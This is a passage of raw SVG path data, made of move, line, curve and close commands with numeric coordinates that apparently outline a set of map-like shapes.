733.31934,253.10324 C 731.49896,251.12146 730.00741,249.03125 730.00478,248.45834 C 730.00215,247.88542 728.425,245.74688 726.5,243.70602 C 724.575,241.66516 722.94809,239.4339 722.88465,238.74768 C 722.43026,233.83282 720.86575,230.19816 718.99387,229.70865 C 717.98367,229.44447 716.17917,227.31137 714.98388,224.96841 C 712.14822,219.41005 708.47377,215.4244 707.55524,216.91062 C 707.17385,217.52772 706.4429,217.77373 705.9309,217.45729 C 705.41891,217.14086 705,217.37348 705,217.97423 C 705,219.51933 709.76383,228.73601 710.93731,229.46126 C 711.47375,229.79279 711.6724,230.69013 711.37877,231.45533 C 711.07836,232.23818 711.77437,233.34406 712.97031,233.98411 C 715.58242,235.38207 717.34867,239.48739 717.08239,243.5419 C 716.94809,245.58686 717.5998,247.22554 719.0709,248.5419 C 720.27445,249.61885 722.08687,252.41716 723.09849,254.76036 C 724.11012,257.10357 725.2893,258.96278 725.71891,258.89194 C 726.14851,258.82111 727.175,258.82334 728,258.89689 C 729.31417,259.01406 729.31765,259.14595 728.02803,259.96152 C 726.77935,260.75119 726.83383,260.999 728.38712,261.59506 C 731.45579,262.77262 735.51914,267.11478 735.18269,268.85693 C 734.96427,269.98793 735.36595,269.80672 736.47155,268.27548 C 737.88085,266.32361 737.90476,265.71078 736.66664,263.27548 z M 745.65737,267.97033 C 747.77081,267.29597 750.53367,266.35177 751.79705,265.87211 C 753.06043,265.39245 754.97293,265 756.04705,265 C 757.12117,265 758,264.64906 758,264.22014 C 758,263.79122 760.26764,262.56031 763.0392,261.48479 C 765.81076,260.40927 768.74679,258.5092 769.56372,257.26241 C 770.88209,255.25032 770.87415,254.6573 769.49307,251.9866 C 768.18555,249.45814 767.50301,249.06932 765.21855,249.55159 C 763.72335,249.86723 761.375,250.3515 760,250.62773 C 758.625,250.90397 755.42411,253.16063 752.88691,255.64254 C 748.93818,259.50523 748.20349,259.88616 747.78546,258.2876 C 747.51399,257.24951 745.4332,255.68792 743.1004,254.77157 L 738.90371,253.12307 L 737.84562,255.81153 C 737.11331,257.67226 737.10319,259.7214 737.81278,262.46707 C 738.41837,264.81037 738.47856,267.1058 737.95982,268.07508 C 737.2485,269.40419 737.53133,269.66665 739.44817,269.45623 C 740.74978,269.31335 743.54392,268.6447 745.65737,267.97033 z M 732.35446,265.39025 C 731.33451,264.5746 729.29331,263.44484 727.81847,262.87967 C 726.04625,262.20054 724.53374,260.3937 723.35814,257.55138 C 721.70893,253.56396 721.39064,253.31646 718.98867,254.15379 C 715.78123,255.27191 713.19504,262.75388 715.68564,263.70961 C 716.48248,264.01539 717.57039,263.82961 718.10322,263.29678 C 719.85358,261.54642 727.95961,263.50506 730.82535,266.37081 C 732.29016,267.83561 733.6507,268.5479 733.84878,267.95367 C 734.04685,267.35944 733.37441,266.2059 732.35446,265.39025 z M 932.86763,265.75266 C 932.02996,264.18746 931.52699,263.91903 931.21056,264.86832 C 930.96068,265.61796 931.37358,266.62237 932.12812,267.10034 C 934.1265,268.36624 934.19731,268.2372 932.86763,265.75266 z M 544.40484,260.38738 C 544.87144,259.17144 545.35087,259.04631 546.35384,259.8787 C 547.08544,260.48587 547.9638,260.70287 548.30575,260.36091 C 548.64771,260.01896 552.8813,259.68536 557.71374,259.61959 C 565.87413,259.50852 566.48393,259.35753 566.27439,257.5 C 565.07837,246.89745 562.81826,230.14695 562.3952,228.75 C 561.97831,227.3734 562.46352,227 564.66926,227 C 567.28548,227 567.12517,226.76555 562.2761,223.5 C 556.21083,219.41541 556,219.36502 556,222 C 556,223.77778 555.33333,224 550,224 L 544,224 L 544,228.38337 C 544,231.99171 543.62966,232.86358 541.90542,233.31448 C 540.14745,233.7742 539.91915,234.35542 540.48487,236.93111 L 541.15891,240 L 534.00803,240 C 527.6319,240 527.02068,240.16354 528.36654,241.50939 C 529.45863,242.60149 529.81228,244.81324 529.64568,249.50939 L 529.41543,256 L 533.02062,256 C 535.72102,256 537.34715,256.75291 539.5,259 C 542.78543,262.42925 543.53946,262.64254 544.40484,260.38738 z M 764.57494,248.64594 C 774.58425,246.57284 779.19593,244.17382 780.15666,240.54024 C 781.06844,237.09178 780.31227,236.3975 774.59196,235.43106 C 771.93159,234.9816 769.58415,233.64116 767.39803,231.3232 C 763.72428,227.4279 761,223.51808 761,222.14094 C 761,220.60729 755.69921,215.55567 752.70295,214.23389 C 751.16457,213.55525 748.41275,213 746.58781,213 C 744.74436,213 742.09782,212.07818 740.63283,210.92582 C 739.18253,209.78502 735.43582,207.31002 732.3068,205.42582 C 729.17777,203.54162 727.11598,202 727.72505,202 C 728.33412,202 732.19648,204.25 736.30807,207 C 744.026,212.16207 749.2268,213.45731 750.36163,210.5 C 750.67821,209.675 751.86719,209 753.0038,209 C 754.78878,209 754.91827,208.71581 753.95416,206.91435 C 753.34025,205.76725 753.06245,204.60422 753.33683,204.32984 C 754.19702,203.46964 750.63715,200 748.89439,200 C 747.42518,200 746.53266,198.4935 745.485,194.24522 C 745.31481,193.55509 746.13619,192.31759 747.31029,191.49522 C 748.80479,190.44843 748.99521,190 747.94519,190 C 747.12029,190 745.28515,188.67779 743.86711,187.06177 C 741.74578,184.64425 740.64847,184.18305 737.6754,184.45937 C 734.22794,184.77977 730.8099,186.98249 731.10056,188.69643 C 731.67852,192.10439 728.59898,195.60913 723.52116,197.32231 C 722.9828,197.50395 723.36698,198.91114 724.37489,200.4494 C 725.3828,201.98767 725.79352,202.99042 725.2876,202.67775 C 724.78168,202.36507 722.72185,202.67508 720.71019,203.36666 C 717.36308,204.51734 717.18794,204.75937 718.64673,206.21816 C 720.10552,207.67695 719.90443,208.03487 716.27753,210.43503 C 713.92039,211.99492 711.64268,212.80012 710.65712,212.42192 C 708.0725,211.43011 708.66196,213.75597 712.29031,218.86602 C 714.09997,221.41471 716.20101,224.7375 716.95929,226.25 C 717.71756,227.7625 718.90396,229 719.59574,229 C 721.17957,229 724,234.54166 724,237.65364 C 724,239.9488 727.12255,244 728.89159,244 C 729.38197,244 730.05684,245.09032 730.3913,246.42293 C 730.72576,247.75554 732.1768,250.24509 733.61582,251.95527 C 735.96671,254.74915 736.35507,254.89667 737.44293,253.40894 C 738.56201,251.87851 738.99754,251.90532 743.19777,253.76328 C 745.69704,254.86883 748.07755,256.31646 748.48778,256.98023 C 749.00305,257.81396 750.51155,256.93866 753.36683,254.14919 C 756.83222,250.76367 758.64307,249.87453 764.57494,248.64594 z M 777.58179,254 C 779.06464,254 780,253.4198 780,252.5 C 780,251.675 780.65182,251 781.44848,251 C 783.1163,251 788,246.74804 788,245.29596 C 788,244.75988 789.80432,242.65185 792.00959,240.61145 C 795.97554,236.94202 796.00003,236.87531 794.25959,234.48225 C 793.29182,233.15158 791.65312,232.04871 790.61803,232.03142 C 789.58295,232.01414 787.2205,231.06333 785.36815,229.91851 C 782.94718,228.42227 782.15694,228.24541 782.55759,229.28947 C 782.86413,230.08831 782.41408,231.01086 781.55747,231.33957 C 779.81546,232.00805 779.47731,235.07731 780.98011,236.58011 C 782.59741,238.19741 780.27138,244.77909 777.80598,245.56158 C 776.63351,245.93371 774.16558,246.86852 772.32169,247.63895 L 768.96918,249.03972 L 770.55218,252.10091 C 771.60328,254.13351 772.64397,254.96686 773.64938,254.58105 C 774.48219,254.26147 776.25177,254 777.58179,254 z M 973.03647,247.96353 C 975.75062,245.24938 974.72494,243.85132 970.9779,245.15755 C 968.15419,246.1419 967.19972,247.86638 968.66667,249.33333 C 969.78114,250.44781 970.90425,250.09575 973.03647,247.96353 z M 603.5,246.41619 C 605.15,246.04285 607.85,244.73498 609.5,243.5098 C 611.15,242.28462 615.65,239.3655 619.5,237.02286 C 623.35,234.68022 626.62309,232.65613 626.77354,232.52489 C 627.83176,231.60172 625.33659,229 623.39301,229 C 621.82357,229 621,228.42483 621,227.32874 C 621,226.40955 620.25526,224.83455 619.34501,223.82874 C 618.22486,222.59099 618.09198,222 618.93383,222 C 619.83324,222 620.05376,220.40788 619.73023,216.25 C 618.97194,206.50485 616.90322,200.82114 613.34259,198.70031 C 611.70138,197.72275 611.56694,194.31102 613.14884,193.78372 C 614.64704,193.28432 615.00666,187.13296 613.59155,186.21109 C 610.56635,184.24033 590.39556,186.03949 586.4371,188.63317 C 585.28389,189.38879 584.0602,189.72687 583.71779,189.38446 C 583.37539,189.04205 582.42835,189.4288 581.61325,190.24389 C 580.08417,191.77298 580.33558,197.63787 582.00455,199.37186 C 583.6078,201.03757 581.89767,203.01242 579.39574,202.38448 C 577.94738,202.02096 577,202.2215 577,202.89159 C 577,203.50122 576.325,204 575.5,204 C 574.675,204 573.98252,204.5625 573.96115,205.25 C 573.91747,206.65534 565.42269,211.04357 562.79705,211.01714 C 559.13571,210.98029 556,213.25885 556,215.95621 C 556,218.28879 558.00955,219.83915 573.5,229.45734 C 583.125,235.43362 591,240.72352 591,241.21268 C 591,241.70183 592.6145,242.77663 594.58777,243.60112 C 597.08864,244.64605 597.99938,245.55923 597.59406,246.61548 C 597.17636,247.70398 597.50371,247.98491 598.75629,247.61288 C 599.71533,247.32803 601.85,246.78952 603.5,246.41619 z M 672.12784,244 C 672.71912,244 673.03155,236.48953 672.93558,224.58326 C 672.84949,213.90405 673.04646,204.73384 673.3733,204.20501 C 673.70013,203.67618 672.56081,202.96216 670.84148,202.6183 C 669.12215,202.27443 667.17765,201.25763 666.52036,200.35874 C 665.54384,199.02326 664.60979,198.89447 661.41265,199.65444 C 658.00561,200.4643 657.49491,200.95432 657.46065,203.4464 C 657.43633,205.21464 656.61755,206.84198 655.31808,207.7048 C 653.46654,208.93417 652.81313,208.85635 649.85744,207.05438 C 648.01085,205.92858 645.27833,205.00579 643.78518,205.00374 C 642.12828,205.00146 640.66739,204.24703 640.03625,203.06772 C 638.78057,200.72148 635.74819,199.56547 630.75122,199.52806 C 628.40452,199.5105 627.00198,199.96751 627.00122,200.75 C 627.00055,201.4375 626.51786,202 625.92857,202 C 625.33929,202 624.18214,202.675 623.35714,203.5 C 622.53214,204.325 622.16939,205 622.55102,205 C 622.93265,205 622.68316,205.67685 621.99659,206.50411 C 620.65908,208.11571 620.34085,221.78232 621.54845,225.75 C 621.93642,227.02471 623.03438,228 624.08145,228 C 625.09795,228 626.4113,228.9 627,230 C 627.5887,231.1 628.61703,232.00277 629.28518,232.00616 C 629.95333,232.00955 631.75699,232.66797 633.29331,233.46933 C 635.75809,234.75497 636.47024,234.7434 639.34822,233.37099 C 642.58431,231.82781 642.71103,231.86646 655.55491,238.31462 C 662.67471,241.88905 669.0993,244.63053 669.83179,244.40679 C 670.56427,244.18306 671.59749,244 672.12784,244 z M 539.42717,236.56585 C 538.97365,234.75889 539.35524,233.7951 540.90812,232.82531 C 542.49875,231.83194 543,230.49826 543,227.25945 L 543,223 L 549,223 C 554.73333,223 555,222.88889 555,220.5 C 555,218.06163 554.82127,218.00043 547.75,218.01728 C 541.53072,218.0321 540.21272,218.35198 538.47931,220.26728 C 535.86093,223.1604 529,234.47557 529,235.90073 C 529,236.50533 528.55,237 528,237 C 527.45,237 527,237.45 527,238 C 527,238.5644 529.83968,239 533.51905,239 C 539.92633,239 540.02763,238.95827 539.42717,236.56585 z M 913.36763,230.78582 C 913.10051,230.35362 913.81025,230 914.94482,230 C 916.54471,230 917.27779,228.99007 918.21124,225.5 C 918.8732,223.025 919.7897,221 920.2479,221 C 920.7061,221 922.39509,220.02844 924.00123,218.84097 C 926.94547,216.6642 927.22326,214.59336 924.42708,215.66636 C 923.5972,215.98481 922.9899,215.85266 923.07753,215.37268 C 923.48255,213.15411 922.7818,212.5 920,212.5 C 918.35,212.5 917,212.8375 917,213.25 C 917,213.6625 916.55514,214 916.01143,214 C 915.46772,214 914.10313,214.7875 912.97901,215.75 C 911.85489,216.7125 910.61225,217.43047 910.21758,217.34549 C 909.82291,217.26051 909.1625,217.71051 908.75,218.34549 C 908.19763,219.19578 907.80237,219.20372 907.25,218.37563 C 906.8375,217.75723 905.06879,216.94085 903.31953,216.56145 C 900.74598,216.00327 899.9365,216.25014 899.07752,217.85515 C 897.71338,220.40406 898.8235,220.79237 905.1532,219.98035 C 907.81894,219.63836 910,219.72788 910,220.17928 C 910,220.63068 907.92686,221 905.39301,221 C 901.60288,221 900.89365,221.28047 901.39301,222.58179 C 901.72686,223.45177 902,224.57677 902,225.08179 C 902,225.5868 903.725,226 905.83333,226 C 910.41652,226 911.26032,226.64506 909.92963,229.13148 C 909.25243,230.39684 909.26379,231 909.96482,231 C 910.53417,231 910.94676,232.4625 910.88169,234.25 L 910.76337,237.5 L 910,234.5 C 909.58015,232.85 909.15176,232.175 909.04803,233 C 908.91337,234.071 908.61363,233.928 908,232.5 C 907.52731,231.4 907.10894,231.10557 907.07029,231.84571 C 907.03163,232.58585 907.7875,234.52938 908.75,236.16467 L 910.5,239.13793 L 912.17665,235.35478 C 913.0988,233.27405 913.63474,231.21802 913.36763,230.78582 z M 707.42765,235.16677 C 709.80209,233.89415 710.44735,232.98247 710.03175,231.48747 C 709.3217,228.93324 703.15541,216.96126 701.53971,215 C 699.74452,212.82086 698.95726,210.14445 699.93392,209.54084 C 700.39953,209.25308 701.52599,210.58867 702.43716,212.50882 C 704.01775,215.83966 706,217.19284 706,214.94098 C 706,214.35852 706.38674,214.12099 706.85943,214.41312 C 707.77728,214.98039 707.61115,211.50091 706.56264,208.19735 C 706.08624,206.69635 704.74817,206.04971 701.21365,205.61238 C 694.56316,204.7895 690.81249,204.91073 689.51129,205.99063 C 688.80584,206.5761 686.58857,206.37949 683.53588,205.46076 C 677.07536,203.51643 674.31729,203.59893 673.86663,205.75 C 673.66498,206.7125 673.63568,214.1427 673.80151,222.26155 L 674.10302,237.0231 L 689.18703,236.94085 C 701.33123,236.87464 704.88626,236.52888 707.42765,235.16677 z M 714.5,236 C 713.69473,234.69704 708,234.69704 708,236 C 708,236.55 709.60156,237 711.55902,237 C 713.67705,237 714.8678,236.59512 714.5,236 z M 902,235.42895 C 904.32735,234.95566 906,233.46394 906,231.86163 C 906,230.80321 906.675,229.67821 907.5,229.36163 C 910.21369,228.32029 909.06649,227 905.44798,227 C 902.42203,227 901.74521,226.56756 900.8781,224.08017 C 900.31828,222.47427 899.17,220.89548 898.32637,220.57175 C 897.4662,220.24167 897.04389,219.32801 897.36486,218.49157 C 897.67966,217.67121 897.5495,217 897.0756,217 C 894.86804,217 895.32129,220.06975 897.79954,221.90309 C 900.25742,223.72136 900.29788,223.84988 898.25,223.33378 C 895.66889,222.68329 895.15996,224.46367 897.6535,225.42053 C 899.14419,225.99256 899.11957,226.19689 897.4035,227.49571 C 896.13668,228.45451 895.95389,228.94703 896.85699,228.9682 C 897.63404,228.98641 897.97323,229.62737 897.65066,230.46797 C 897.34084,231.27536 897.51769,232.20192 898.04367,232.52699 C 898.56965,232.85207 899,234.01803 899,235.11803 C 899,236.47468 899.4021,236.86272 900.25,236.32433 C 900.9375,235.88779 901.725,235.48487 902,235.42895 z M 832.125,229 C 835.31583,229 835.76368,227.90654 833.5,225.64286 C 832.675,224.81786 832,223.47321 832,222.65476 C 832,221.83631 831.4375,220.95812 830.75,220.70323 C 828.86358,220.00384 832.34719,216.73913 835.31786,216.4224 C 837.34502,216.20627 843,211.85114 843,210.50607 C 843,210.2844 844.11657,208.89825 845.48126,207.42572 C 846.84596,205.95318 847.71744,204.35182 847.41788,203.86713 C 847.11833,203.38244 847.62956,202.69564 848.55396,202.34092 C 850.04743,201.76782 850.00612,201.57364 848.18308,200.59798 C 847.0547,199.99409 846.17794,199.275 846.23472,199 C 846.2915,198.725 845.82137,197.53475 845.18999,196.35501 C 843.55268,193.29565 845.49815,192.0423 851.2839,192.42909 C 856.74064,192.79389 857.32342,191.59192 853.45286,187.95571 C 851.30333,185.93634 850.01553,185.59676 845.20319,185.78041 C 842.0668,185.90009 839.34958,186.45127 839.16492,187.00524 C 838.98026,187.55921 838.34114,187.71084 837.74465,187.34219 C 837.03793,186.90541 836.9012,187.30016 837.35217,188.47536 C 838.10172,190.42866 836.07593,196 834.61613,196 C 833.48441,196 831.21622,198.81957 829.99056,201.75 C 829.3755,203.22056 828.19532,204 826.58377,204 C 825.22761,204 823.83538,204.45734 823.48992,205.01631 C 823.14446,205.57528 822.41933,205.75916 821.87853,205.42493 C 821.33773,205.0907 820.37093,206.20633 819.73009,207.90411 C 818.3915,211.45045 815.27828,212.41991 807.05732,211.85042 C 803.63796,211.61355 801.99896,211.88252 801.99938,212.68045 C 801.99972,213.3297 803.0125,214.0047 804.25,214.18045 C 805.69596,214.38581 806.61419,215.30404 806.81955,216.75 C 806.9953,217.9875 807.54368,219 808.03817,219 C 809.91383,219 807.74639,221.84684 805.42764,222.4288 C 804.09244,222.76392 803,223.69041 803,224.48767 C 803,225.28493 803.5625,225.7267 804.25,225.46939 C 804.9375,225.21208 808.65,224.8887 812.5,224.75078 C 818.06391,224.55145 819.85902,224.85902 821.25,226.25 C 822.2125,227.2125 823,228.50625 823,229.125 C 823,229.85167 824.10648,230.0287 826.125,229.625 C 827.84375,229.28125 830.54375,229 832.125,229 z M 802.30916,223.92579 C 802.60749,222.78497 803.71598,221.62553 804.77248,221.34925 C 807.25284,220.70062 806.55472,215.95782 803.87577,215.25726 C 802.86314,214.99245 801.43797,213.57975 800.70872,212.11793 C 799.54189,209.77896 799.60972,209.22248 801.27406,207.48003 C 803.13021,205.53676 803.12861,205.49432 801.18784,205.19423 C 798.47157,204.77423 797.40414,197.70569 799.33849,192.94779 C 800.81379,189.31899 800.57698,187 798.73112,187 C 798.1249,187 796.6999,186.17645 795.56445,185.16989 C 790.95388,181.08269 781.08014,180.41339 777.30331,183.93205 C 774.1122,186.90502 769.39367,187.21704 763.66622,184.83384 C 756.46834,181.83879 755.66321,180.62114 757.99903,176.263 C 759.75412,172.98838 759.77157,172.58101 758.25589,170.26778 C 756.76111,167.98647 756.52884,167.92387 755.38139,169.4931 C 754.69481,170.43205 753.67382,170.91645 753.11252,170.56954 C 752.55122,170.22264 750.99614,170.21385 749.65679,170.55 C 747.88847,170.99382 747.25973,171.79746 747.3608,173.48464 C 747.43736,174.76253 747.88781,175.56861 748.3618,175.27593 C 748.8358,174.98324 749.589,175.33499 750.03559,176.05758 C 750.69412,177.12311 751.13716,177.13106 752.37998,176.09961 C 753.22281,175.40012 754.3821,175.11812 754.9562,175.47293 C 756.34394,176.3306 756.29612,179 754.89301,179 C 754.28417,179 754.04504,178.325 754.36163,177.5 C 755.08279,175.62068 754.07041,175.63217 751.55887,177.5318 C 749.34417,179.20692 747.58389,179.4823 748.49292,178.01145 C 748.84433,177.44286 748.43917,177.27798 747.5392,177.62333 C 746.67863,177.95356 745.32497,177.68467 744.53107,177.02579 C 742.31709,175.18835 740.76346,176.6895 742.16628,179.31069 C 742.8107,180.51481 743.23788,181.5 743.11555,181.5 C 742.99322,181.5 743.57434,183.13035 744.40693,185.123 C 745.31294,187.2914 746.83998,189.00434 748.21036,189.38944 C 750.22499,189.95558 750.31239,190.18104 748.93803,191.26643 C 746.16745,193.45449 746.07857,195.51823 748.66697,197.56031 C 752.02622,200.21054 754.47489,202.8705 754.625,204.03242 C 754.69375,204.56459 754.80625,205.68357 754.875,206.51905 C 754.96606,207.62567 755.67876,207.86774 757.5,207.41064 C 759.00758,207.03226 760,207.21073 760,207.86021 C 760,208.45257 760.56563,208.72018 761.25696,208.45489 C 762.4307,208.00448 764.02387,210.14359 765.57306,214.25 C 765.93617,215.2125 766.89881,216 767.71226,216 C 768.52571,216 770.38573,216.82677 771.84563,217.83727 C 776.08481,220.7715 777.92952,221.08781 781.13518,219.4301 C 784.32121,217.78254 787,218.75695 787,221.56343 C 787,223.39912 787.74047,223.70936 794,224.49622 C 797.025,224.87648 799.6875,225.37039 799.91667,225.5938 C 800.86925,226.52245 801.79976,225.87371 802.30916,223.92579 z M 555,215.02568 C 555,212.83967 559.56676,210 563.08231,210 C 565.52258,210 572,206.32763 572,204.94412 C 572,203.5974 577.98269,200.77938 579.55823,201.38397 C 580.31598,201.67475 581.17816,201.52074 581.47421,201.04174 C 581.77025,200.56273 581.58344,200.01989 581.05909,199.83541 C 580.53473,199.65093 579.8331,197.93867 579.4999,196.03038 C 578.73843,191.66927 578.73523,191.66652 574.15842,191.44456 C 572.06625,191.34309 569.33618,190.7151 568.09159,190.04902 C 565.50157,188.66288 565.74129,188.5045 564.06927,192.70655 C 563.16822,194.971 561.77267,196.24995 559.31928,197.05964 C 555.02694,198.47624 551.73989,203.37959 552.5493,207.15854 C 552.99748,209.25095 552.56374,210.2092 550.51248,211.65854 C 542.88446,217.04815 542.91255,216.93006 549.25,216.96673 C 554.31964,216.99606 555,216.76639 555,215.02568 z M 754.76554,212.61932 C 753.81159,211.89493 753.32409,211.00924 753.68221,210.65112 C 754.04033,210.29301 753.58333,210 752.66667,210 C 751.75,210 751,210.6375 751,211.41667 C 751,212.90113 752.46988,213.80973 755,213.88925 C 756.20564,213.92714 756.15963,213.67793 754.76554,212.61932 z M 715.55213,209.83674 L 719.21858,207.67348 L 716.90691,205.92978 L 714.59523,204.18608 L 718.63095,203.09937 C 721.07818,202.4404 722.66667,201.41977 722.66667,200.50633 C 722.66667,198.59976 721.65612,198.60935 717.90036,200.55153 C 716.25019,201.40486 714.09908,201.84883 713.12012,201.53813 C 711.69114,201.08458 711.13959,201.81378 710.32269,205.2366 C 709.76306,207.58147 709.39911,208.4875 709.51392,207.25 C 709.63765,205.91631 709.16826,205 708.36133,205 C 706.35905,205 706.70451,207.70451 709,210 C 711.45062,212.45062 711.10745,212.45917 715.55213,209.83674 z M 816.5231,210.23469 C 817.0858,209.83061 818.34307,208.24816 819.31703,206.71813 C 820.29099,205.18811 821.487,204.18295 821.97483,204.48445 C 822.46267,204.78594 823.14446,204.57528 823.48992,204.01631 C 823.83538,203.45734 825.21648,203 826.55902,203 C 828.3459,203 829,202.45566 829,200.96862 C 829,199.85135 829.64659,198.68911 830.43686,198.38586 C 831.22713,198.0826 831.62898,197.19672 831.32987,196.41724 C 830.97586,195.4947 831.4625,195 832.72403,195 C 835.28383,195 837.99185,190.23103 836.09702,189.05996 C 835.37622,188.61448 835.18832,188.00165 835.67946,187.69811 C 836.43995,187.22809 836.55688,184.94419 836.04797,180.5 C 835.98499,179.95 835.15196,180.43451 834.19678,181.57668 C 833.24161,182.71886 831.90658,183.46886 831.23005,183.24335 C 830.55352,183.01784 830,183.39583 830,184.08333 C 830,184.77083 829.71583,185.04917 829.36852,184.70185 C 829.0212,184.35453 827.8962,184.52037 826.86852,185.07037 C 825.59405,185.75244 824.34035,185.71733 822.92514,184.95993 C 820.41907,183.61873 813,184.66437 813,186.35878 C 813,187.00943 810.98347,188.64335 808.51883,189.98971 C 804.99501,191.91468 803.77727,192.17727 802.81883,191.21883 C 801.86039,190.26039 802.17683,190 804.3,190 C 805.785,190 807,189.55 807,189 C 807,188.45 807.88417,188 808.96482,188 C 810.04547,188 811.39172,187.13658 811.9565,186.08128 C 812.52128,185.02599 814.33711,183.86523 815.99168,183.50183 C 819.02656,182.83526 820.20071,181 817.59229,181 C 814.76803,181 805.65974,175.48882 804.01547,172.78504 C 803.08634,171.25722 802.04872,170.28461 801.70965,170.62369 C 800.6467,171.68663 796,170.02987 796,168.58794 C 796,166.94692 793.92403,166.01153 791.35763,166.49618 C 790.33593,166.68912 788.9375,166.88141 788.25,166.92349 C 787.5625,166.96557 787,167.88875 787,168.975 C 787,170.66213 786.52629,170.86076 783.75,170.33774 C 781.9625,170.00099 779.78957,169.11224 778.92126,168.36274 C 777.12313,166.81063 772.40571,166.53454 771.54271,167.9309 C 771.22627,168.4429 771.43206,169.14899 772,169.5 C 772.56794,169.85101 772.77104,170.56145 772.45133,171.07875 C 772.13161,171.59606 772.79927,173.20065 773.93502,174.64451 C 775.07076,176.08838 776,178.55903 776,180.13486 C 776,182.88174 777.2935,183.95217 778.4167,182.13478 C 780.18159,179.27914 791.84089,180.70683 796.02712,184.29119 C 797.12478,185.23104 798.69272,186 799.51143,186 C 801.49425,186 801.85788,192.17142 800.01226,194.5 C 799.57633,195.05 799.33781,196.625 799.48221,198 C 799.62661,199.375 799.80218,201.23502 799.87238,202.13337 C 799.94257,203.03172 800.93242,204.01057 802.07205,204.30859 C 804.03745,204.82255 804.06063,204.97783 802.52247,207.32536 C 801.24354,209.27726 801.17548,209.91036 802.20042,210.32119 C 804.21062,211.12694 815.37447,211.05952 816.5231,210.23469 z M 654.93384,207.03541 C 656.13456,206.3928 656.58648,205.28763 656.28768,203.72459 C 655.74182,200.86908 657.37114,199.38987 662.0187,198.52159 C 664.7338,198.01434 666.05689,198.31475 667.81205,199.837 C 669.08508,200.94109 672.93949,202.30658 676.56529,202.93799 C 680.12851,203.55849 684.21374,204.51096 685.64357,205.05459 C 687.47605,205.75129 688.66198,205.6955 689.66203,204.86553 C 691.31008,203.49777 698.0346,202.84478 699.5,203.91021 C 700.05,204.31009 701.74034,204.71408 703.25631,204.80795 C 705.72116,204.96059 706.33884,204.28817 709.09778,198.44888 C 710.79462,194.85751 711.9359,191.27534 711.63396,190.4885 C 711.33202,189.70166 711.66998,188.47288 712.38498,187.75788 C 713.45165,186.69121 712.9953,186.43979 709.84249,186.35712 C 707.72912,186.30171 706,186.61739 706,187.05863 C 706,188.53144 701.53548,188.62013 698.61382,187.20538 C 696.37124,186.11945 695.24773,186.06464 693.57546,186.95961 C 692.092,187.75354 690.62339,187.80731 688.84896,187.13268 C 686.84771,186.3718 685.88348,186.52635 684.51743,187.82696 C 683.14915,189.12969 682.85783,189.17607 683.20127,188.03651 C 683.44385,187.23159 682.60512,185.61177 681.33743,184.43691 C 680.06973,183.26205 679.32521,182.00812 679.68293,181.6504 C 680.04065,181.29268 679.38903,181 678.23489,181 C 676.05827,181 675.79127,178.74036 677.49131,174.70687 C 678.44118,172.45322 677.94309,171.96353 674.36564,171.63394 C 672.78954,171.48873 671.575,170.94919 671.66667,170.43496 C 671.75833,169.92073 670.52083,169.5 668.91667,169.5 C 665.69656,169.5 665.28334,170.16034 667.40275,171.91929 C 668.47992,172.81326 668.92646,172.78365 669.32662,171.79174 C 669.73636,170.77609 670.06364,170.81039 670.85789,171.95225 C 672.32859,174.06664 671.19884,175.17678 668.85367,173.92168 C 665.31259,172.02656 665.68519,173.72945 669.65648,177.59088 C 672.54324,180.39777 673.12661,181.45318 672,181.83069 C 671.175,182.10715 670.48894,182.14583 670.47542,181.91667 C 670.4619,181.6875 669.73078,182.17263 668.85072,182.99474 C 667.97065,183.81684 667.46736,185.05434 667.73229,185.74474 C 668.00041,186.44345 667.47233,187 666.54125,187 C 664.18869,187 660.84171,185.06513 661.46098,184.06313 C 661.74533,183.60305 661.22155,182.61313 660.29703,181.86331 C 658.85065,180.69024 658.73943,180.70932 659.5,182 C 660.25224,183.27654 660.14072,183.30289 658.7514,182.17689 C 657.85351,181.44917 657.34489,180.26481 657.62112,179.54496 C 657.89735,178.82512 657.00265,177.02688 655.63289,175.54889 C 654.0964,173.89099 653.2109,171.83724 653.32121,170.18734 C 653.46465,168.04186 652.80793,167.17626 650,165.80977 C 648.075,164.87295 646.05,163.74502 645.5,163.30324 C 644.95,162.86146 643.2625,161.86146 641.75,161.08102 C 640.2375,160.30058 638.99311,159.40058 638.98469,159.08102 C 638.97627,158.76146 638.56056,157.85394 638.0609,157.0643 C 637.31111,155.87938 636.87918,155.85538 635.58805,156.92693 C 634.28529,158.00812 633.92017,157.95555 633.40484,156.61262 C 632.52671,154.32424 630.45482,154.61218 630.27133,157.0481 C 630.17426,158.33676 631.01524,159.50545 632.5393,160.19986 C 633.87154,160.80687 635.20386,162.06693 635.5,163 C 636.07832,164.82213 640.0186,166.99033 642.79705,167.01531 C 644.19377,167.02787 644.24433,167.19245 643.0782,167.93051 C 642.02529,168.59692 642.70855,169.1137 645.71171,169.92237 C 650.10525,171.10543 652.80078,173.38705 651.06923,174.45722 C 650.50388,174.80662 649.09349,174.58522 647.93502,173.96522 C 645.38855,172.60239 644.26065,173.40422 645.91692,175.39989 C 646.87969,176.55996 646.67319,177.36065 644.87908,179.42406 C 643.64722,180.84083 641.99734,182 641.21268,182 C 640.33977,182 640.01508,182.59691 640.37615,183.53785 C 640.7019,184.38674 640.34559,185.31389 639.58084,185.60735 C 637.80045,186.29055 628.75654,182.20295 629.47532,181.03993 C 629.77415,180.55642 632.9295,180.20959 636.48721,180.26919 C 640.04493,180.32879 643.30323,179.99545 643.72789,179.52845 C 644.15255,179.06144 643.96859,178.98384 643.3191,179.35599 C 642.6696,179.72814 641.85554,179.57528 641.51008,179.01631 C 641.16462,178.45734 641.37436,178 641.97617,178 C 642.76049,178 642.76724,177.4336 642,176 C 641.4113,174.9 640.27047,174 639.46482,174 C 638.65917,174 638,173.52344 638,172.94098 C 638,172.35852 637.60099,172.12857 637.11331,172.42997 C 636.62563,172.73138 635.67053,172.30793 634.99086,171.48899 C 634.3112,170.67005 632.97996,170 632.03254,170 C 631.08513,170 629.50588,169.11149 628.5231,168.02553 C 627.54032,166.93957 625.94032,165.79844 624.96753,165.48969 C 623.99474,165.18094 622.92224,163.82631 622.58418,162.47939 C 621.6808,158.88002 618.31512,158.52835 612.35939,161.41104 C 607.95944,163.5407 606.6889,163.75289 603.54118,162.88376 C 599.31583,161.71708 596.91333,162.95256 597.68311,165.89623 C 598.04183,167.26797 597.21223,168.1018 594.32988,169.26649 C 592.22345,170.11766 589.22164,172.16067 587.6592,173.80653 C 584.99305,176.61502 584.93157,176.86478 586.6592,177.86909 C 588.28158,178.81221 588.30035,178.94279 586.81739,178.96959 C 585.89195,178.98632 584.84913,179.9 584.5,181 C 584.15087,182.1 583.27565,183 582.55506,183 C 581.83446,183 580.68469,183.675 580,184.5 C 579.26628,185.38408 